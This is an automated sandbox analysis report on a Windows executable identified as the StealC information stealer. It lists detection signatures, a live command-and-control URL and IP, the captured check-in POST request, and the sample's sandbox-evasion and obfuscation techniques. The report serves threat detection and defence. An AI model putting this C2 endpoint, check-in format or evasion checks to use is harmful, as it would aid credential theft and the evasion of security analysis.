Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1531486
MD5:1d5102a006a1f46ae6d349ca54497fc3
SHA1:9d2909785110f5795d032f46680c4fc173b38740
SHA256:aa9447ab2cb7ff4768b9782a6d5a79a71627b2d7c25ca662cd5614128eda50fe
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4132 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1D5102A006A1F46AE6D349CA54497FC3)
  • cleanup

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2138952975.0000000005740000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4132JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4132JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.e20000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-11T09:45:27.583709+020020442431Malware Command and Control Activity Detected192.168.2.649711185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.e20000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phprVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpLVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpMVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpeVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpyVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpAVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 53%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00E2C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E29AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E27240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E27240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E29B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E38EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00E38EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E34910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E34910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E2DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E2E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E34570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E34570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E2ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E33EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E33EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E2F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E2BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E2DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 46 39 46 46 39 32 37 42 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="hwid"A5F9FF927BF51660493485------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build"doma------GDAAKFIDGIEGDGDHIDAK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E24880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00E24880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 46 39 46 46 39 32 37 42 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="hwid"A5F9FF927BF51660493485------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build"doma------GDAAKFIDGIEGDGDHIDAK--
                Source: file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2190392041.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190392041.0000000001992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)
                Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpA
                Source: file.exe, 00000000.00000002.2190392041.00000000019C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpL
                Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpM
                Source: file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe
                Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
                Source: file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
                Source: file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
                Source: file.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37V

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D81350_2_011D8135
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA0120_2_011EA012
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F18440_2_010F1844
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E50BE0_2_011E50BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AE3170_2_010AE317
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E6B7C0_2_011E6B7C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EBB9D0_2_011EBB9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F4BA20_2_011F4BA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EF22E0_2_011EF22E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E1AB90_2_011E1AB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E35260_2_011E3526
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B0D600_2_011B0D60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01107D820_2_01107D82
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F0D8A0_2_011F0D8A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E85B70_2_011E85B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DF5A20_2_010DF5A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A342D0_2_012A342D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121C4AE0_2_0121C4AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0113EF2C0_2_0113EF2C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01130E460_2_01130E46
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E245C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: lkjltntr ZLIB complexity 0.9950160824781165
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000003.2138952975.0000000005740000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E38680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00E38680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E33720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00E33720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\VFFLBM5O.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 53%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1852416 > 1048576
                Source: file.exeStatic PE information: Raw size of lkjltntr is bigger than: 0x100000 < 0x19e200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lkjltntr:EW;uktbgiwd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lkjltntr:EW;uktbgiwd:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E39860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c9e7d should be: 0x1d04c2
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: lkjltntr
                Source: file.exeStatic PE information: section name: uktbgiwd
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01297924 push 37438520h; mov dword ptr [esp], eax0_2_01297945
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01297924 push 7D4ADEC7h; mov dword ptr [esp], eax0_2_01297973
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01297924 push ecx; mov dword ptr [esp], esi0_2_01297989
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D8135 push ebp; mov dword ptr [esp], esi0_2_011D813F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D8135 push 18248B3Bh; mov dword ptr [esp], edx0_2_011D81D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D8135 push edi; mov dword ptr [esp], ebp0_2_011D81E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D8135 push edi; mov dword ptr [esp], 5E31782Bh0_2_011D8262
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D8135 push edx; mov dword ptr [esp], eax0_2_011D82DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D8135 push ecx; mov dword ptr [esp], ebx0_2_011D82F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D8135 push esi; mov dword ptr [esp], ecx0_2_011D8352
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01257113 push 5D95D018h; mov dword ptr [esp], esi0_2_012571FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01310107 push edx; mov dword ptr [esp], 0E968DD6h0_2_0131017C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A4116 push 577F224Fh; mov dword ptr [esp], ecx0_2_012A413C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128116B push 08472276h; mov dword ptr [esp], ecx0_2_0128118F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125F171 push esi; mov dword ptr [esp], ebp0_2_0125F21C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125C171 push edx; mov dword ptr [esp], ebx0_2_0125C1C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01280944 push edx; mov dword ptr [esp], ebx0_2_01280994
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01213953 push eax; mov dword ptr [esp], ecx0_2_01213964
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012651E2 push eax; mov dword ptr [esp], esi0_2_01265210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012651E2 push 7431BF53h; mov dword ptr [esp], esi0_2_012652A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130E9E0 push 7F6EF196h; mov dword ptr [esp], edx0_2_0130E9EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3B035 push ecx; ret 0_2_00E3B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA012 push 42107803h; mov dword ptr [esp], ebx0_2_011EA020
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA012 push edi; mov dword ptr [esp], ecx0_2_011EA0B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA012 push eax; mov dword ptr [esp], ebp0_2_011EA0C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA012 push esi; mov dword ptr [esp], edx0_2_011EA117
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA012 push 0B307AAFh; mov dword ptr [esp], edx0_2_011EA17E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA012 push ebx; mov dword ptr [esp], ecx0_2_011EA225
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA012 push ebx; mov dword ptr [esp], edx0_2_011EA25E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA012 push 79D5F791h; mov dword ptr [esp], ebp0_2_011EA298
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA012 push ebx; mov dword ptr [esp], edx0_2_011EA2E5
                Source: file.exeStatic PE information: section name: lkjltntr entropy: 7.9546951511511

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E39860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13558
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081E3A second address: 1081E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081E3E second address: 1081E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F8673 second address: 11F867E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F867E second address: 11F868E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB91CA54Ch 0x00000009 rdtsc
